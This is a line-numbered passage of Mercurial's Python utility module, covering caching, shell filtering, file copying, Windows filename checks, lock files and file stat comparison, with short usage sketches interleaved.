895 895 C.next = D (node.prev.next = node.next)
896 896 D.prev = C (node.next.prev = node.prev)
897 897 E.next = N (head.prev.next = node)
898 898 N.prev = E (node.prev = head.prev)
899 899 N.next = A (node.next = head)
900 900 A.prev = N (head.prev = node)
901 901 """
902 902 head = self._head
903 903 # C.next = D
904 904 node.prev.next = node.next
905 905 # D.prev = C
906 906 node.next.prev = node.prev
907 907 # N.prev = E
908 908 node.prev = head.prev
909 909 # N.next = A
910 910 # It is tempting to do just "head" here; however, if node is
911 911 # adjacent to head, this will do bad things.
912 912 node.next = head.prev.next
913 913 # E.next = N
914 914 node.next.prev = node
915 915 # A.prev = N
916 916 node.prev.next = node
917 917
918 918 self._head = node
919 919
920 920 def _addcapacity(self):
921 921 """Add a node to the circular linked list.
922 922
923 923 The new node is inserted before the head node.
924 924 """
925 925 head = self._head
926 926 node = _lrucachenode()
927 927 head.prev.next = node
928 928 node.prev = head.prev
929 929 node.next = head
930 930 head.prev = node
931 931 self._size += 1
932 932 return node
933 933
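
For example, with a capacity of two the least recently used entry is the one recycled on overflow:

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']      # access makes 'a' the newest entry
    d['c'] = 3  # evicts 'b', the oldest entry
    'b' in d    # -> False
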
934 934 def lrucachefunc(func):
935 935 '''cache most recent results of function calls'''
936 936 cache = {}
937 937 order = collections.deque()
938 938 if func.__code__.co_argcount == 1:
939 939 def f(arg):
940 940 if arg not in cache:
941 941 if len(cache) > 20:
942 942 del cache[order.popleft()]
943 943 cache[arg] = func(arg)
944 944 else:
945 945 order.remove(arg)
946 946 order.append(arg)
947 947 return cache[arg]
948 948 else:
949 949 def f(*args):
950 950 if args not in cache:
951 951 if len(cache) > 20:
952 952 del cache[order.popleft()]
953 953 cache[args] = func(*args)
954 954 else:
955 955 order.remove(args)
956 956 order.append(args)
957 957 return cache[args]
958 958
959 959 return f
960 960
961 961 class propertycache(object):
962 962 def __init__(self, func):
963 963 self.func = func
964 964 self.name = func.__name__
965 965 def __get__(self, obj, type=None):
966 966 result = self.func(obj)
967 967 self.cachevalue(obj, result)
968 968 return result
969 969
970 970 def cachevalue(self, obj, value):
971 971 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
972 972 obj.__dict__[self.name] = value
973 973
974 974 def clearcachedproperty(obj, prop):
975 975 '''clear a cached property value, if one has been set'''
976 976 if prop in obj.__dict__:
977 977 del obj.__dict__[prop]
978 978
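
Usage sketch (repoinfo is a hypothetical class): the descriptor computes once, then cachevalue() stores the result in the instance __dict__ so later lookups bypass the descriptor entirely:

    class repoinfo(object):
        @propertycache
        def expensive(self):
            print('computing')  # runs only on the first access
            return 42

    info = repoinfo()
    info.expensive  # prints 'computing', returns 42
    info.expensive  # served from info.__dict__, no recomputation
    clearcachedproperty(info, 'expensive')  # next access recomputes
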
979 979 def pipefilter(s, cmd):
980 980 '''filter string S through command CMD, returning its output'''
981 981 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
982 982 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
983 983 pout, perr = p.communicate(s)
984 984 return pout
985 985
986 986 def tempfilter(s, cmd):
987 987 '''filter string S through a pair of temporary files with CMD.
988 988 CMD is used as a template to create the real command to be run,
989 989 with the strings INFILE and OUTFILE replaced by the real names of
990 990 the temporary files generated.'''
991 991 inname, outname = None, None
992 992 try:
993 993 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
994 994 fp = os.fdopen(infd, pycompat.sysstr('wb'))
995 995 fp.write(s)
996 996 fp.close()
997 997 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
998 998 os.close(outfd)
999 999 cmd = cmd.replace('INFILE', inname)
1000 1000 cmd = cmd.replace('OUTFILE', outname)
1001 1001 code = os.system(cmd)
1002 1002 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1003 1003 code = 0
1004 1004 if code:
1005 1005 raise Abort(_("command '%s' failed: %s") %
1006 1006 (cmd, explainexit(code)))
1007 1007 return readfile(outname)
1008 1008 finally:
1009 1009 try:
1010 1010 if inname:
1011 1011 os.unlink(inname)
1012 1012 except OSError:
1013 1013 pass
1014 1014 try:
1015 1015 if outname:
1016 1016 os.unlink(outname)
1017 1017 except OSError:
1018 1018 pass
1019 1019
1020 1020 filtertable = {
1021 1021 'tempfile:': tempfilter,
1022 1022 'pipe:': pipefilter,
1023 1023 }
1024 1024
1025 1025 def filter(s, cmd):
1026 1026 "filter a string through a command that transforms its input to its output"
1027 1027 for name, fn in filtertable.iteritems():
1028 1028 if cmd.startswith(name):
1029 1029 return fn(s, cmd[len(name):].lstrip())
1030 1030 return pipefilter(s, cmd)
1031 1031
1032 1032 def binary(s):
1033 1033 """return true if a string is binary data"""
1034 1034 return bool(s and '\0' in s)
1035 1035
1036 1036 def increasingchunks(source, min=1024, max=65536):
1037 1037 '''return no less than min bytes per chunk while data remains,
1038 1038 doubling min after each chunk until it reaches max'''
1039 1039 def log2(x):
1040 1040 if not x:
1041 1041 return 0
1042 1042 i = 0
1043 1043 while x:
1044 1044 x >>= 1
1045 1045 i += 1
1046 1046 return i - 1
1047 1047
1048 1048 buf = []
1049 1049 blen = 0
1050 1050 for chunk in source:
1051 1051 buf.append(chunk)
1052 1052 blen += len(chunk)
1053 1053 if blen >= min:
1054 1054 if min < max:
1055 1055 min = min << 1
1056 1056 nmin = 1 << log2(blen)
1057 1057 if nmin > min:
1058 1058 min = nmin
1059 1059 if min > max:
1060 1060 min = max
1061 1061 yield ''.join(buf)
1062 1062 blen = 0
1063 1063 buf = []
1064 1064 if buf:
1065 1065 yield ''.join(buf)
1066 1066
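
For example, many small chunks are coalesced into progressively larger ones, starting at min and growing toward max (a sketch; exact chunk sizes depend on the input):

    source = (b'x' * 100 for _ in range(100))
    for chunk in increasingchunks(source, min=1024, max=4096):
        pass  # first chunk is >= 1024 bytes, later chunks grow toward 4096
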
1067 1067 Abort = error.Abort
1068 1068
1069 1069 def always(fn):
1070 1070 return True
1071 1071
1072 1072 def never(fn):
1073 1073 return False
1074 1074
1075 1075 def nogc(func):
1076 1076 """disable garbage collector
1077 1077
1078 1078 Python's garbage collector triggers a GC each time a certain number of
1079 1079 container objects (the number being defined by gc.get_threshold()) are
1080 1080 allocated even when marked not to be tracked by the collector. Tracking has
1081 1081 no effect on when GCs are triggered, only on what objects the GC looks
1082 1082 into. As a workaround, disable GC while building complex (huge)
1083 1083 containers.
1084 1084
1085 1085 This garbage collector issue has been fixed in 2.7, but it still
1086 1086 affects CPython's performance.
1087 1087 """
1088 1088 def wrapper(*args, **kwargs):
1089 1089 gcenabled = gc.isenabled()
1090 1090 gc.disable()
1091 1091 try:
1092 1092 return func(*args, **kwargs)
1093 1093 finally:
1094 1094 if gcenabled:
1095 1095 gc.enable()
1096 1096 return wrapper
1097 1097
1098 1098 if pycompat.ispypy:
1099 1099 # PyPy runs slower with gc disabled
1100 1100 nogc = lambda x: x
1101 1101
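
Usage sketch (buildhugemapping is hypothetical): wrap a function that allocates many container objects so collection pauses are skipped while it runs:

    @nogc
    def buildhugemapping(items):
        return dict((k, [k]) for k in items)
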
1102 1102 def pathto(root, n1, n2):
1103 1103 '''return the relative path from one place to another.
1104 1104 root should use os.sep to separate directories
1105 1105 n1 should use os.sep to separate directories
1106 1106 n2 should use "/" to separate directories
1107 1107 returns an os.sep-separated path.
1108 1108
1109 1109 If n1 is a relative path, it is assumed to be
1110 1110 relative to root.
1111 1111 n2 should always be relative to root.
1112 1112 '''
1113 1113 if not n1:
1114 1114 return localpath(n2)
1115 1115 if os.path.isabs(n1):
1116 1116 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1117 1117 return os.path.join(root, localpath(n2))
1118 1118 n2 = '/'.join((pconvert(root), n2))
1119 1119 a, b = splitpath(n1), n2.split('/')
1120 1120 a.reverse()
1121 1121 b.reverse()
1122 1122 while a and b and a[-1] == b[-1]:
1123 1123 a.pop()
1124 1124 b.pop()
1125 1125 b.reverse()
1126 1126 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1127 1127
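
A worked example under POSIX conventions (paths hypothetical): the shared prefix of n1 and root/n2 is stripped, and each remaining component of n1 becomes a '..':

    # root and n1 are os.sep-separated; n2 is '/'-separated
    pathto(b'/repo', b'/repo/a/b', b'a/c')  # -> '../c'
    pathto(b'/repo', b'', b'a/c')           # -> 'a/c' (empty n1)
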
1128 1128 def mainfrozen():
1129 1129 """return True if we are a frozen executable.
1130 1130
1131 1131 The code supports py2exe (most common, Windows only) and tools/freeze
1132 1132 (portable, not much used).
1133 1133 """
1134 1134 return (safehasattr(sys, "frozen") or # new py2exe
1135 1135 safehasattr(sys, "importers") or # old py2exe
1136 1136 imp.is_frozen(u"__main__")) # tools/freeze
1137 1137
1138 1138 # the location of data files matching the source code
1139 1139 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1140 1140 # executable version (py2exe) doesn't support __file__
1141 1141 datapath = os.path.dirname(pycompat.sysexecutable)
1142 1142 else:
1143 1143 datapath = os.path.dirname(pycompat.fsencode(__file__))
1144 1144
1145 1145 i18n.setdatapath(datapath)
1146 1146
1147 1147 _hgexecutable = None
1148 1148
1149 1149 def hgexecutable():
1150 1150 """return location of the 'hg' executable.
1151 1151
1152 1152 Defaults to $HG or 'hg' in the search path.
1153 1153 """
1154 1154 if _hgexecutable is None:
1155 1155 hg = encoding.environ.get('HG')
1156 1156 mainmod = sys.modules[pycompat.sysstr('__main__')]
1157 1157 if hg:
1158 1158 _sethgexecutable(hg)
1159 1159 elif mainfrozen():
1160 1160 if getattr(sys, 'frozen', None) == 'macosx_app':
1161 1161 # Env variable set by py2app
1162 1162 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1163 1163 else:
1164 1164 _sethgexecutable(pycompat.sysexecutable)
1165 1165 elif (os.path.basename(
1166 1166 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1167 1167 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1168 1168 else:
1169 1169 exe = findexe('hg') or os.path.basename(sys.argv[0])
1170 1170 _sethgexecutable(exe)
1171 1171 return _hgexecutable
1172 1172
1173 1173 def _sethgexecutable(path):
1174 1174 """set location of the 'hg' executable"""
1175 1175 global _hgexecutable
1176 1176 _hgexecutable = path
1177 1177
1178 1178 def _isstdout(f):
1179 1179 fileno = getattr(f, 'fileno', None)
1180 1180 return fileno and fileno() == sys.__stdout__.fileno()
1181 1181
1182 1182 def shellenviron(environ=None):
1183 1183 """return environ with optional override, useful for shelling out"""
1184 1184 def py2shell(val):
1185 1185 'convert python object into string that is useful to shell'
1186 1186 if val is None or val is False:
1187 1187 return '0'
1188 1188 if val is True:
1189 1189 return '1'
1190 1190 return str(val)
1191 1191 env = dict(encoding.environ)
1192 1192 if environ:
1193 1193 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1194 1194 env['HG'] = hgexecutable()
1195 1195 return env
1196 1196
1197 1197 def system(cmd, environ=None, cwd=None, out=None):
1198 1198 '''enhanced shell command execution.
1199 1199 run with environment maybe modified, maybe in different dir.
1200 1200
1201 1201 if out is specified, it is assumed to be a file-like object that has a
1202 1202 write() method. stdout and stderr will be redirected to out.'''
1203 1203 try:
1204 1204 stdout.flush()
1205 1205 except Exception:
1206 1206 pass
1207 1207 cmd = quotecommand(cmd)
1208 1208 env = shellenviron(environ)
1209 1209 if out is None or _isstdout(out):
1210 1210 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1211 1211 env=env, cwd=cwd)
1212 1212 else:
1213 1213 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1214 1214 env=env, cwd=cwd, stdout=subprocess.PIPE,
1215 1215 stderr=subprocess.STDOUT)
1216 1216 for line in iter(proc.stdout.readline, ''):
1217 1217 out.write(line)
1218 1218 proc.wait()
1219 1219 rc = proc.returncode
1220 1220 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1221 1221 rc = 0
1222 1222 return rc
1223 1223
1224 1224 def checksignature(func):
1225 1225 '''wrap a function with code to check for calling errors'''
1226 1226 def check(*args, **kwargs):
1227 1227 try:
1228 1228 return func(*args, **kwargs)
1229 1229 except TypeError:
1230 1230 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1231 1231 raise error.SignatureError
1232 1232 raise
1233 1233
1234 1234 return check
1235 1235
1236 1236 # a whitelist of known filesystems where hardlinks work reliably
1237 1237 _hardlinkfswhitelist = {
1238 1238 'btrfs',
1239 1239 'ext2',
1240 1240 'ext3',
1241 1241 'ext4',
1242 1242 'hfs',
1243 1243 'jfs',
1244 1244 'NTFS',
1245 1245 'reiserfs',
1246 1246 'tmpfs',
1247 1247 'ufs',
1248 1248 'xfs',
1249 1249 'zfs',
1250 1250 }
1251 1251
1252 1252 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1253 1253 '''copy a file, preserving mode and optionally other stat info like
1254 1254 atime/mtime
1255 1255
1256 1256 checkambig argument is used with filestat, and is useful only if
1257 1257 destination file is guarded by any lock (e.g. repo.lock or
1258 1258 repo.wlock).
1259 1259
1260 1260 copystat and checkambig should be exclusive.
1261 1261 '''
1262 1262 assert not (copystat and checkambig)
1263 1263 oldstat = None
1264 1264 if os.path.lexists(dest):
1265 1265 if checkambig:
1266 1266 oldstat = checkambig and filestat.frompath(dest)
1267 1267 unlink(dest)
1268 1268 if hardlink:
1269 1269 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1270 1270 # unless we are confident that dest is on a whitelisted filesystem.
1271 1271 try:
1272 1272 fstype = getfstype(os.path.dirname(dest))
1273 1273 except OSError:
1274 1274 fstype = None
1275 1275 if fstype not in _hardlinkfswhitelist:
1276 1276 hardlink = False
1277 1277 if hardlink:
1278 1278 try:
1279 1279 oslink(src, dest)
1280 1280 return
1281 1281 except (IOError, OSError):
1282 1282 pass # fall back to normal copy
1283 1283 if os.path.islink(src):
1284 1284 os.symlink(os.readlink(src), dest)
1285 1285 # copytime is ignored for symlinks, but in general copytime isn't needed
1286 1286 # for them anyway
1287 1287 else:
1288 1288 try:
1289 1289 shutil.copyfile(src, dest)
1290 1290 if copystat:
1291 1291 # copystat also copies mode
1292 1292 shutil.copystat(src, dest)
1293 1293 else:
1294 1294 shutil.copymode(src, dest)
1295 1295 if oldstat and oldstat.stat:
1296 1296 newstat = filestat.frompath(dest)
1297 1297 if newstat.isambig(oldstat):
1298 1298 # stat of copied file is ambiguous to original one
1299 1299 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1300 1300 os.utime(dest, (advanced, advanced))
1301 1301 except shutil.Error as inst:
1302 1302 raise Abort(str(inst))
1303 1303
1304 1304 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1305 1305 """Copy a directory tree using hardlinks if possible."""
1306 1306 num = 0
1307 1307
1308 1308 gettopic = lambda: hardlink and _('linking') or _('copying')
1309 1309
1310 1310 if os.path.isdir(src):
1311 1311 if hardlink is None:
1312 1312 hardlink = (os.stat(src).st_dev ==
1313 1313 os.stat(os.path.dirname(dst)).st_dev)
1314 1314 topic = gettopic()
1315 1315 os.mkdir(dst)
1316 1316 for name, kind in listdir(src):
1317 1317 srcname = os.path.join(src, name)
1318 1318 dstname = os.path.join(dst, name)
1319 1319 def nprog(t, pos):
1320 1320 if pos is not None:
1321 1321 return progress(t, pos + num)
1322 1322 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1323 1323 num += n
1324 1324 else:
1325 1325 if hardlink is None:
1326 1326 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1327 1327 os.stat(os.path.dirname(dst)).st_dev)
1328 1328 topic = gettopic()
1329 1329
1330 1330 if hardlink:
1331 1331 try:
1332 1332 oslink(src, dst)
1333 1333 except (IOError, OSError):
1334 1334 hardlink = False
1335 1335 shutil.copy(src, dst)
1336 1336 else:
1337 1337 shutil.copy(src, dst)
1338 1338 num += 1
1339 1339 progress(topic, num)
1340 1340 progress(topic, None)
1341 1341
1342 1342 return hardlink, num
1343 1343
1344 1344 _winreservednames = {
1345 1345 'con', 'prn', 'aux', 'nul',
1346 1346 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1347 1347 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1348 1348 }
1349 1349 _winreservedchars = ':*?"<>|'
1350 1350 def checkwinfilename(path):
1351 1351 r'''Check that the base-relative path is a valid filename on Windows.
1352 1352 Returns None if the path is ok, or a UI string describing the problem.
1353 1353
1354 1354 >>> checkwinfilename(b"just/a/normal/path")
1355 1355 >>> checkwinfilename(b"foo/bar/con.xml")
1356 1356 "filename contains 'con', which is reserved on Windows"
1357 1357 >>> checkwinfilename(b"foo/con.xml/bar")
1358 1358 "filename contains 'con', which is reserved on Windows"
1359 1359 >>> checkwinfilename(b"foo/bar/xml.con")
1360 1360 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1361 1361 "filename contains 'AUX', which is reserved on Windows"
1362 1362 >>> checkwinfilename(b"foo/bar/bla:.txt")
1363 1363 "filename contains ':', which is reserved on Windows"
1364 1364 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1365 1365 "filename contains '\\x07', which is invalid on Windows"
1366 1366 >>> checkwinfilename(b"foo/bar/bla ")
1367 1367 "filename ends with ' ', which is not allowed on Windows"
1368 1368 >>> checkwinfilename(b"../bar")
1369 1369 >>> checkwinfilename(b"foo\\")
1370 1370 "filename ends with '\\', which is invalid on Windows"
1371 1371 >>> checkwinfilename(b"foo\\/bar")
1372 1372 "directory name ends with '\\', which is invalid on Windows"
1373 1373 '''
1374 1374 if path.endswith('\\'):
1375 1375 return _("filename ends with '\\', which is invalid on Windows")
1376 1376 if '\\/' in path:
1377 1377 return _("directory name ends with '\\', which is invalid on Windows")
1378 1378 for n in path.replace('\\', '/').split('/'):
1379 1379 if not n:
1380 1380 continue
1381 1381 for c in _filenamebytestr(n):
1382 1382 if c in _winreservedchars:
1383 1383 return _("filename contains '%s', which is reserved "
1384 1384 "on Windows") % c
1385 1385 if ord(c) <= 31:
1386 1386 return _("filename contains '%s', which is invalid "
1387 1387 "on Windows") % escapestr(c)
1388 1388 base = n.split('.')[0]
1389 1389 if base and base.lower() in _winreservednames:
1390 1390 return _("filename contains '%s', which is reserved "
1391 1391 "on Windows") % base
1392 1392 t = n[-1:]
1393 1393 if t in '. ' and n not in '..':
1394 1394 return _("filename ends with '%s', which is not allowed "
1395 1395 "on Windows") % t
1396 1396
1397 1397 if pycompat.iswindows:
1398 1398 checkosfilename = checkwinfilename
1399 1399 timer = time.clock
1400 1400 else:
1401 1401 checkosfilename = platform.checkosfilename
1402 1402 timer = time.time
1403 1403
1404 1404 if safehasattr(time, "perf_counter"):
1405 1405 timer = time.perf_counter
1406 1406
1407 1407 def makelock(info, pathname):
1408 1408 try:
1409 1409 return os.symlink(info, pathname)
1410 1410 except OSError as why:
1411 1411 if why.errno == errno.EEXIST:
1412 1412 raise
1413 1413 except AttributeError: # no symlink in os
1414 1414 pass
1415 1415
1416 1416 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1417 1417 os.write(ld, info)
1418 1418 os.close(ld)
1419 1419
1420 1420 def readlock(pathname):
1421 1421 try:
1422 1422 return os.readlink(pathname)
1423 1423 except OSError as why:
1424 1424 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1425 1425 raise
1426 1426 except AttributeError: # no symlink in os
1427 1427 pass
1428 1428 fp = posixfile(pathname)
1429 1429 r = fp.read()
1430 1430 fp.close()
1431 1431 return r
1432 1432
1433 1433 def fstat(fp):
1434 1434 '''stat file object that may not have fileno method.'''
1435 1435 try:
1436 1436 return os.fstat(fp.fileno())
1437 1437 except AttributeError:
1438 1438 return os.stat(fp.name)
1439 1439
1440 1440 # File system features
1441 1441
1442 1442 def fscasesensitive(path):
1443 1443 """
1444 1444 Return true if the given path is on a case-sensitive filesystem
1445 1445
1446 1446 Requires a path (like /foo/.hg) ending with a foldable final
1447 1447 directory component.
1448 1448 """
1449 1449 s1 = os.lstat(path)
1450 1450 d, b = os.path.split(path)
1451 1451 b2 = b.upper()
1452 1452 if b == b2:
1453 1453 b2 = b.lower()
1454 1454 if b == b2:
1455 1455 return True # no evidence against case sensitivity
1456 1456 p2 = os.path.join(d, b2)
1457 1457 try:
1458 1458 s2 = os.lstat(p2)
1459 1459 if s2 == s1:
1460 1460 return False
1461 1461 return True
1462 1462 except OSError:
1463 1463 return True
1464 1464
1465 1465 try:
1466 1466 import re2
1467 1467 _re2 = None
1468 1468 except ImportError:
1469 1469 _re2 = False
1470 1470
1471 1471 class _re(object):
1472 1472 def _checkre2(self):
1473 1473 global _re2
1474 1474 try:
1475 1475 # check if match works, see issue3964
1476 1476 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1477 1477 except ImportError:
1478 1478 _re2 = False
1479 1479
1480 1480 def compile(self, pat, flags=0):
1481 1481 '''Compile a regular expression, using re2 if possible
1482 1482
1483 1483 For best performance, use only re2-compatible regexp features. The
1484 1484 only flags from the re module that are re2-compatible are
1485 1485 IGNORECASE and MULTILINE.'''
1486 1486 if _re2 is None:
1487 1487 self._checkre2()
1488 1488 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1489 1489 if flags & remod.IGNORECASE:
1490 1490 pat = '(?i)' + pat
1491 1491 if flags & remod.MULTILINE:
1492 1492 pat = '(?m)' + pat
1493 1493 try:
1494 1494 return re2.compile(pat)
1495 1495 except re2.error:
1496 1496 pass
1497 1497 return remod.compile(pat, flags)
1498 1498
1499 1499 @propertycache
1500 1500 def escape(self):
1501 1501 '''Return the version of escape corresponding to self.compile.
1502 1502
1503 1503 This is imperfect because whether re2 or re is used for a particular
1504 1504 function depends on the flags, etc, but it's the best we can do.
1505 1505 '''
1506 1506 global _re2
1507 1507 if _re2 is None:
1508 1508 self._checkre2()
1509 1509 if _re2:
1510 1510 return re2.escape
1511 1511 else:
1512 1512 return remod.escape
1513 1513
1514 1514 re = _re()
1515 1515
1516 1516 _fspathcache = {}
1517 1517 def fspath(name, root):
1518 1518 '''Get name in the case stored in the filesystem
1519 1519
1520 1520 The name should be relative to root, and be normcase-ed for efficiency.
1521 1521
1522 1522 Note that this function is unnecessary, and should not be
1523 1523 called, for case-sensitive filesystems (simply because it's expensive).
1524 1524
1525 1525 The root should be normcase-ed, too.
1526 1526 '''
1527 1527 def _makefspathcacheentry(dir):
1528 1528 return dict((normcase(n), n) for n in os.listdir(dir))
1529 1529
1530 1530 seps = pycompat.ossep
1531 1531 if pycompat.osaltsep:
1532 1532 seps = seps + pycompat.osaltsep
1533 1533 # Protect backslashes. This gets silly very quickly.
1534 1534 seps.replace('\\','\\\\')
1535 1535 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1536 1536 dir = os.path.normpath(root)
1537 1537 result = []
1538 1538 for part, sep in pattern.findall(name):
1539 1539 if sep:
1540 1540 result.append(sep)
1541 1541 continue
1542 1542
1543 1543 if dir not in _fspathcache:
1544 1544 _fspathcache[dir] = _makefspathcacheentry(dir)
1545 1545 contents = _fspathcache[dir]
1546 1546
1547 1547 found = contents.get(part)
1548 1548 if not found:
1549 1549 # retry "once per directory" per "dirstate.walk" which
1550 1550 # may take place for each patch of "hg qpush", for example
1551 1551 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1552 1552 found = contents.get(part)
1553 1553
1554 1554 result.append(found or part)
1555 1555 dir = os.path.join(dir, part)
1556 1556
1557 1557 return ''.join(result)
1558 1558
1559 1559 def checknlink(testfile):
1560 1560 '''check whether hardlink count reporting works properly'''
1561 1561
1562 1562 # testfile may be open, so we need a separate file for checking to
1563 1563 # work around issue2543 (or testfile may get lost on Samba shares)
1564 1564 f1, f2, fp = None, None, None
1565 1565 try:
1566 1566 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1567 1567 suffix='1~', dir=os.path.dirname(testfile))
1568 1568 os.close(fd)
1569 1569 f2 = '%s2~' % f1[:-2]
1570 1570
1571 1571 oslink(f1, f2)
1572 1572 # nlinks() may behave differently for files on Windows shares if
1573 1573 # the file is open.
1574 1574 fp = posixfile(f2)
1575 1575 return nlinks(f2) > 1
1576 1576 except OSError:
1577 1577 return False
1578 1578 finally:
1579 1579 if fp is not None:
1580 1580 fp.close()
1581 1581 for f in (f1, f2):
1582 1582 try:
1583 1583 if f is not None:
1584 1584 os.unlink(f)
1585 1585 except OSError:
1586 1586 pass
1587 1587
1588 1588 def endswithsep(path):
1589 1589 '''Check path ends with os.sep or os.altsep.'''
1590 1590 return (path.endswith(pycompat.ossep)
1591 1591 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1592 1592
1593 1593 def splitpath(path):
1594 1594 '''Split path by os.sep.
1595 1595 Note that this function does not use os.altsep because it is
1596 1596 an alternative to a simple "xxx.split(os.sep)".
1597 1597 It is recommended to use os.path.normpath() before using this
1598 1598 function if needed.'''
1599 1599 return path.split(pycompat.ossep)
1600 1600
1601 1601 def gui():
1602 1602 '''Are we running in a GUI?'''
1603 1603 if pycompat.isdarwin:
1604 1604 if 'SSH_CONNECTION' in encoding.environ:
1605 1605 # handle SSH access to a box where the user is logged in
1606 1606 return False
1607 1607 elif getattr(osutil, 'isgui', None):
1608 1608 # check if a CoreGraphics session is available
1609 1609 return osutil.isgui()
1610 1610 else:
1611 1611 # pure build; use a safe default
1612 1612 return True
1613 1613 else:
1614 1614 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1615 1615
1616 1616 def mktempcopy(name, emptyok=False, createmode=None):
1617 1617 """Create a temporary file with the same contents from name
1618 1618
1619 1619 The permission bits are copied from the original file.
1620 1620
1621 1621 If the temporary file is going to be truncated immediately, you
1622 1622 can use emptyok=True as an optimization.
1623 1623
1624 1624 Returns the name of the temporary file.
1625 1625 """
1626 1626 d, fn = os.path.split(name)
1627 1627 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1628 1628 os.close(fd)
1629 1629 # Temporary files are created with mode 0600, which is usually not
1630 1630 # what we want. If the original file already exists, just copy
1631 1631 # its mode. Otherwise, manually obey umask.
1632 1632 copymode(name, temp, createmode)
1633 1633 if emptyok:
1634 1634 return temp
1635 1635 try:
1636 1636 try:
1637 1637 ifp = posixfile(name, "rb")
1638 1638 except IOError as inst:
1639 1639 if inst.errno == errno.ENOENT:
1640 1640 return temp
1641 1641 if not getattr(inst, 'filename', None):
1642 1642 inst.filename = name
1643 1643 raise
1644 1644 ofp = posixfile(temp, "wb")
1645 1645 for chunk in filechunkiter(ifp):
1646 1646 ofp.write(chunk)
1647 1647 ifp.close()
1648 1648 ofp.close()
1649 1649 except: # re-raises
1650 1650 try:
1651 1651 os.unlink(temp)
1652 1652 except OSError:
1653 1653 pass
1654 1654 raise
1655 1655 return temp
1656 1656
1657 1657 class filestat(object):
1658 1658 """help to exactly detect change of a file
1659 1659
1660 1660 'stat' attribute is result of 'os.stat()' if specified 'path'
1661 1661 exists. Otherwise, it is None. This can avoid preparative
1662 1662 'exists()' examination on client side of this class.
1663 1663 """
1664 1664 def __init__(self, stat):
1665 1665 self.stat = stat
1666 1666
1667 1667 @classmethod
1668 1668 def frompath(cls, path):
1669 1669 try:
1670 1670 stat = os.stat(path)
1671 1671 except OSError as err:
1672 1672 if err.errno != errno.ENOENT:
1673 1673 raise
1674 1674 stat = None
1675 1675 return cls(stat)
1676 1676
1677 1677 @classmethod
1678 1678 def fromfp(cls, fp):
1679 1679 stat = os.fstat(fp.fileno())
1680 1680 return cls(stat)
1681 1681
1682 1682 __hash__ = object.__hash__
1683 1683
1684 1684 def __eq__(self, old):
1685 1685 try:
1686 1686 # if ambiguity between stat of new and old file is
1687 1687 # avoided, comparison of size, ctime and mtime is enough
1688 1688 # to exactly detect change of a file regardless of platform
1689 1689 return (self.stat.st_size == old.stat.st_size and
1690 1690 self.stat.st_ctime == old.stat.st_ctime and
1691 1691 self.stat.st_mtime == old.stat.st_mtime)
1692 1692 except AttributeError:
1693 1693 pass
1694 1694 try:
1695 1695 return self.stat is None and old.stat is None
1696 1696 except AttributeError:
1697 1697 return False
1698 1698
1699 1699 def isambig(self, old):
1700 1700 """Examine whether new (= self) stat is ambiguous against old one
1701 1701
1702 1702 "S[N]" below means stat of a file at N-th change:
1703 1703
1704 1704 - S[n-1].ctime < S[n].ctime: can detect change of a file
1705 1705 - S[n-1].ctime == S[n].ctime
1706 1706 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1707 1707 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1708 1708 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1709 1709 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1710 1710
1711 1711 Case (*2) above means that a file was changed twice or more within
1712 1712 the same second (= S[n-1].ctime), so comparison of timestamps
1713 1713 is ambiguous.
1714 1714
1715 1715 The basic idea to avoid such ambiguity is "advance mtime by 1 sec
1716 1716 if the timestamp is ambiguous".
1717 1717
1718 1718 But advancing mtime only in case (*2) doesn't work as
1719 1719 expected, because a naturally advanced S[n].mtime in case (*1)
1720 1720 might be equal to a manually advanced S[n-1 or earlier].mtime.
1721 1721
1722 1722 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1723 1723 treated as ambiguous regardless of mtime, to avoid overlooking a
1724 1724 change because of a conflict between such mtimes.
1725 1725
1726 1726 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1727 1727 S[n].mtime", even if the size of the file hasn't changed.
1728 1728 """
1729 1729 try:
1730 1730 return (self.stat.st_ctime == old.stat.st_ctime)
